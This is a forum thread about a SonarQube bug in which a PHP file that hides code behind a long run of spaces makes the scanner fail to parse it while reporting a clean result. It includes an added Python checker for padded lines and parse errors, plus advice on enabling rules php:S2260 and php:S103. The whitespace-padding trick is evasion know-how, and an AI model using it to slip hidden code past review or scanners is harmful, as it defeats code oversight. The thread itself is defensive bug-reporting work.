Sonar-Scanner parse error causes SonarQube to show a clean bill of health

Sonar-scanner reports it cannot continue to scan the file.
SonarQube reports the file as having no issues.

Expected result: the sonar-scanner error to be passed to SonarQube and made visible for review.
As this instance is a definite exploit, maybe some basic checks could be made, such as excessive line length.
This behaviour could be exploited by finding any variation such that the sonar-scanner parser generates a false error.

SonarQube

sonar-scanner -v
INFO: Scanner configuration file: /usr/local/Cellar/sonar-scanner/4.0.0.1744/libexec/conf/sonar-scanner.properties
INFO: Project root configuration file: NONE
INFO: SonarQube Scanner 4.0.0.1744
INFO: Java 11.0.1 Oracle Corporation (64-bit)
INFO: Mac OS X 10.14.6 x86_64

Output:
ERROR: Unable to parse file [file:///httpdocs/libraries/joomla/uri/uri.php] at line 1
ERROR: Parse error at line 1 column 4760:

 1: <?php .. long line of spaces to fool the eye ...
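An added example (not code from the thread or from SonarSource) of the basic pre-check the poster asks for: it flags lines that are excessively long or that hide code behind a run of whitespace, and it extracts "Unable to parse file" errors from scanner output so a build can refuse to trust a clean result. The sample PHP, the sample log lines and the thresholds are constructed assumptions.

```python
import re

# Constructed sample: first line hides code behind a long run of spaces,
# mimicking the "long line of spaces to fool the eye" case from the thread.
SAMPLE_PHP = "<?php" + " " * 4000 + "$m420204 = 191; echo 'hidden';\n" + "echo 'ok';\n"

# Constructed sample of sonar-scanner output in the format shown in the thread.
SAMPLE_LOG = """INFO: Sensor PHP sensor
ERROR: Unable to parse file [file:///httpdocs/libraries/joomla/uri/uri.php] at line 1
ERROR: Parse error at line 1 column 4760:
INFO: Sensor PHP sensor (done)
"""

PARSE_ERROR = re.compile(
    r"^ERROR: Unable to parse file \[(?P<path>[^\]]+)\] at line (?P<line>\d+)")


def suspicious_lines(source, max_len=1000, min_pad=200):
    """Return (line_no, reason) for lines longer than max_len or containing a
    run of at least min_pad blanks between two non-blank characters.
    Thresholds are assumptions; tune them per code base."""
    findings = []
    pad = re.compile(r"\S[ \t]{%d,}\S" % min_pad)
    for no, line in enumerate(source.splitlines(), start=1):
        if len(line) > max_len:
            findings.append((no, "line length %d exceeds %d" % (len(line), max_len)))
        m = pad.search(line)
        if m:
            findings.append((no, "code resumes at column %d after %d blanks"
                             % (m.end(), m.end() - m.start() - 2)))
    return findings


def scanner_parse_errors(log):
    """Extract (path, line) for every 'Unable to parse file' error in scanner output."""
    matches = (PARSE_ERROR.match(line) for line in log.splitlines())
    return [(m.group("path"), int(m.group("line"))) for m in matches if m]


def safe_to_trust(source, log):
    """True only when nothing suspicious was found and the scanner parsed the file."""
    return not suspicious_lines(source) and not scanner_parse_errors(log)


if __name__ == "__main__":
    for no, reason in suspicious_lines(SAMPLE_PHP):
        print("line %d: %s" % (no, reason))
    for path, line in scanner_parse_errors(SAMPLE_LOG):
        print("scanner could not parse %s at line %d" % (path, line))
    print("trust clean result:", safe_to_trust(SAMPLE_PHP, SAMPLE_LOG))
```

Run it before or after sonar-scanner in CI and fail the job when `safe_to_trust` is false, so a parse failure can no longer masquerade as a clean report.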

Hi! You can activate the rules “PHP parser failure” (php:S2260) and “Lines should not be too long” (php:S103) in your quality profile to see these issues in the SonarQube UI.

I’ll try that

Unable to do that - logged in as administrator - I can find the rule but cannot select/deselect it.

You probably need to create your own quality profile, because the built-in profiles are read-only.


cool - any idea why this rule is defaulted to false?
I can see lots of people have requested it in sql/tsql/java/…

Yay - it worked (untested yet) - Thank You

Working :slight_smile: